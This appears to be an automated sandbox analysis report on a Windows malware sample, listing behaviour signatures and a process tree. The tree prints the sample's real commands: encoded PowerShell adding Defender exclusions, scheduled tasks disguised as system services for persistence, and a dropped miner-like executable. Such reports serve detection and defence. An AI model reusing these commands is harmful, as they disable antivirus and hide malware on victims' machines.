69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef

Analysis

max time kernel
300s
max time network
178s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
17/09/2022, 10:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
Size

722.4MB
MD5

a2d302bbecc9b38529cc016adc334b17
SHA1

323c64e329187281a418195191f5802a79bc70d9
SHA256

69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef
SHA512

9c299c215b2769ba3729426aab92e198fb966bd411ff550b0771c02404e550451ba8c36575969f5908c3a8dc40d3de670eabe4ba2bf5b06235eb1117b24c2b37
SSDEEP

49152:q+G3R8rSAZkqqKR8GEOWT+RvTKVrcxO5VJhOYJH3/UTM:q+G3+rSikq7R8GEfEagxgbOCOM

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

Executes dropped EXE 1 IoCs

pid	Process
328	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4704	schtasks.exe
4808	schtasks.exe
664	schtasks.exe
1884	schtasks.exe
4688	schtasks.exe
4800	schtasks.exe
200	schtasks.exe
4692	schtasks.exe
1600	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
3644	powershell.exe
3644	powershell.exe
3644	powershell.exe
1268	powershell.exe
2212	powershell.exe
564	powershell.exe
4052	powershell.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
1268	powershell.exe
2212	powershell.exe
328	dllhost.exe
564	powershell.exe
4052	powershell.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
2212	powershell.exe
1268	powershell.exe
328	dllhost.exe
564	powershell.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
4052	powershell.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe
328	dllhost.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	1560	powercfg.exe
Token: SeCreatePagefilePrivilege	1560	powercfg.exe
Token: SeDebugPrivilege	328	dllhost.exe
Token: SeShutdownPrivilege	1248	powercfg.exe
Token: SeCreatePagefilePrivilege	1248	powercfg.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe
Token: SeShutdownPrivilege	4980	powercfg.exe
Token: SeCreatePagefilePrivilege	4980	powercfg.exe
Token: SeShutdownPrivilege	4796	powercfg.exe
Token: SeCreatePagefilePrivilege	4796	powercfg.exe
Token: SeShutdownPrivilege	600	powercfg.exe
Token: SeCreatePagefilePrivilege	600	powercfg.exe
Token: SeShutdownPrivilege	600	powercfg.exe
Token: SeCreatePagefilePrivilege	600	powercfg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 2036	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	67
PID 2536 wrote to memory of 2036	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	67
PID 2536 wrote to memory of 2036	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	67
PID 2036 wrote to memory of 3644	2036	cmd.exe	69
PID 2036 wrote to memory of 3644	2036	cmd.exe	69
PID 2036 wrote to memory of 3644	2036	cmd.exe	69
PID 2536 wrote to memory of 328	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	70
PID 2536 wrote to memory of 328	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	70
PID 2536 wrote to memory of 328	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	70
PID 2536 wrote to memory of 4872	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	71
PID 2536 wrote to memory of 4872	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	71
PID 2536 wrote to memory of 4872	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	71
PID 2536 wrote to memory of 4876	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	72
PID 2536 wrote to memory of 4876	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	72
PID 2536 wrote to memory of 4876	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	72
PID 2536 wrote to memory of 4628	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	73
PID 2536 wrote to memory of 4628	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	73
PID 2536 wrote to memory of 4628	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	73
PID 2536 wrote to memory of 4008	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	74
PID 2536 wrote to memory of 4008	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	74
PID 2536 wrote to memory of 4008	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	74
PID 2536 wrote to memory of 4908	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	75
PID 2536 wrote to memory of 4908	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	75
PID 2536 wrote to memory of 4908	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	75
PID 2536 wrote to memory of 4076	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	76
PID 2536 wrote to memory of 4076	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	76
PID 2536 wrote to memory of 4076	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	76
PID 2536 wrote to memory of 3468	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	79
PID 2536 wrote to memory of 3468	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	79
PID 2536 wrote to memory of 3468	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	79
PID 2536 wrote to memory of 3492	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	80
PID 2536 wrote to memory of 3492	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	80
PID 2536 wrote to memory of 3492	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	80
PID 2536 wrote to memory of 4920	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	81
PID 2536 wrote to memory of 4920	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	81
PID 2536 wrote to memory of 4920	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	81
PID 2536 wrote to memory of 1200	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	82
PID 2536 wrote to memory of 1200	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	82
PID 2536 wrote to memory of 1200	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	82
PID 2536 wrote to memory of 4280	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	83
PID 2536 wrote to memory of 4280	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	83
PID 2536 wrote to memory of 4280	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	83
PID 2536 wrote to memory of 3180	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	88
PID 2536 wrote to memory of 3180	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	88
PID 2536 wrote to memory of 3180	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	88
PID 2536 wrote to memory of 3692	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	89
PID 2536 wrote to memory of 3692	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	89
PID 2536 wrote to memory of 3692	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	89
PID 2536 wrote to memory of 4196	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	91
PID 2536 wrote to memory of 4196	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	91
PID 2536 wrote to memory of 4196	2536	69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe	91
PID 4876 wrote to memory of 4688	4876	cmd.exe	99
PID 4876 wrote to memory of 4688	4876	cmd.exe	99
PID 4876 wrote to memory of 4688	4876	cmd.exe	99
PID 4908 wrote to memory of 4704	4908	cmd.exe	100
PID 4908 wrote to memory of 4704	4908	cmd.exe	100
PID 4908 wrote to memory of 4704	4908	cmd.exe	100
PID 4872 wrote to memory of 4808	4872	cmd.exe	102
PID 4872 wrote to memory of 4808	4872	cmd.exe	102
PID 4872 wrote to memory of 4808	4872	cmd.exe	102
PID 4008 wrote to memory of 4800	4008	cmd.exe	101
PID 4008 wrote to memory of 4800	4008	cmd.exe	101
PID 4008 wrote to memory of 4800	4008	cmd.exe	101
PID 4920 wrote to memory of 876	4920	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe
"C:\Users\Admin\AppData\Local\Temp\69366638da92e5871b80c1b1ac5c36ca499a407422137b34b43d948546a190ef.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAFMASABhAHUAeQBkAEoAMABuAE8AYQBDAFEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAGkAagBhADQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB5AFEAagBnAG0AWABLAGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASwBqACMAPgA="
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAFMASABhAHUAeQBkAEoAMABuAE8AYQBDAFEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAGkAagBhADQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB5AFEAagBnAG0AWABLAGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASwBqACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3644
- C:\ProgramData\Dllhost\dllhost.exe
  "C:\ProgramData\Dllhost\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:2064
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:2668
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:3512
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:2288
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:1784
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo cIУьfзРжч6tZ7IьSнl & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo НHщTХФKAAТ
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4808
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo xkЪъюТU0q5fОы & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ыУрМlLдТoXд5ЖЯПЦTэс
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4688
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo iзРнЦ
  2⤵
  PID:4628
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo oИjЙUИYCjжGpяbAИ4ЯJ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo UlUzъянzю0 & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo NнbfлJ
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4704
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo уиШmnгcai & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo oМ
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:200
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo мшъф & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VvWтсПЖЪГT8zЭШлНньь
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo БЗwха & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo kНvпЦМ1g
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAG8AbwATBGIALwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEgAGQQ0BDUEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHgATgBOADUAdQAXBCsETwAuBEkELgQoBG4ASQAjAD4AIABAACgAIAA8ACMAcAA2BHYASwQ1BBUEEAQzBDUETwROBEIEEwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQgRqADUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjABkERQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA4ADgENgAnBG0AbQBnADgEcABNAEEEMQQjAD4A"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAG8AbwATBGIALwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEgAGQQ0BDUEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHgATgBOADUAdQAXBCsETwAuBEkELgQoBG4ASQAjAD4AIABAACgAIAA8ACMAcAA2BHYASwQ1BBUEEAQzBDUETwROBEIEEwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQgRqADUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjABkERQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA4ADgENgAnBG0AbQBnADgEcABNAEEEMQQjAD4A"
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAGgAMgRFBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMALgRsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAjBBUEFQQxAG4AZwAjAD4AIABAACgAIAA8ACMASgA5ADcAJgRUACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBjADsEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADgENgQxAE8EKQQqBFoAVQBnACwENARkAG8AOQQ3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYELQQjAD4A"
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAGgAMgRFBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMALgRsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAjBBUEFQQxAG4AZwAjAD4AIABAACgAIAA8ACMASgA5ADcAJgRUACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBjADsEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADgENgQxAE8EKQQqBFoAVQBnACwENARkAG8AOQQ3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYELQQjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjADwELwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACoEZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAGgRDADQESARQADwEcABaADQEEARYAEUEWgA5BCMAPgAgAEAAKAAgADwAIwBVAFoAVQBwAFkAQQB1AC4ELgQ8BDwEbgBjACEEYgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJQRWACkEZgAwBCYEFwRCBEkAPQQwBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA/BGoAOABGADIAaQBQADUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOAQ7BDQEMgRDADQEJARABEsEbQA2ACMAPgA="
  2⤵
  PID:4280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjADwELwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjACoEZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAGgRDADQESARQADwEcABaADQEEARYAEUEWgA5BCMAPgAgAEAAKAAgADwAIwBVAFoAVQBwAFkAQQB1AC4ELgQ8BDwEbgBjACEEYgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAJQRWACkEZgAwBCYEFwRCBEkAPQQwBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA/BGoAOABGADIAaQBQADUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOAQ7BDQEMgRDADQEJARABEsEbQA2ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAHkASQR5AEsENQBPADIESgQ7BCQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBEBDwEVQAWBEMANABNBBwEMAQ5AGEAbwAxBHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFcAbgAiBGsATQQyAHMAFwQjAD4AIABAACgAIAA8ACMAOgRKADsEIgROBEwEJwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAEgQVBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAbBBIEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAPwR4AC0EcwArBHMAeQA0ADYANABjACcEIwA+AA=="
  2⤵
  PID:3180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHkASQR5AEsENQBPADIESgQ7BCQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBEBDwEVQAWBEMANABNBBwEMAQ5AGEAbwAxBHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFcAbgAiBGsATQQyAHMAFwQjAD4AIABAACgAIAA8ACMAOgRKADsEIgROBEwEJwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAEgQVBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAbBBIEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAPwR4AC0EcwArBHMAeQA0ADYANABjACcEIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjADAESQR3ADEANAAgBCcEWQAhBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAPARBAB4EMwQsBEcAIQRsAD0EOgRWAFMAGwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMASwBMAE0ERABpABcEegAcBCgEQwBPADUAIwA+ACAAQAAoACAAPAAjAFMAMARjABYEUABPBFcAQwAvBBgESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAeAA6BFQAOQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBIADYEMgByAHMAQQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBQAHEASwROBFoATQRCADUENwREBDcAIwA+AA=="
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjADAESQR3ADEANAAgBCcEWQAhBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAPARBAB4EMwQsBEcAIQRsAD0EOgRWAFMAGwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMASwBMAE0ERABpABcEegAcBCgEQwBPADUAIwA+ACAAQAAoACAAPAAjAFMAMARjABYEUABPBFcAQwAvBBgESwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAeAA6BFQAOQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBIADYEMgByAHMAQQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBQAHEASwROBFoATQRCADUENwREBDcAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
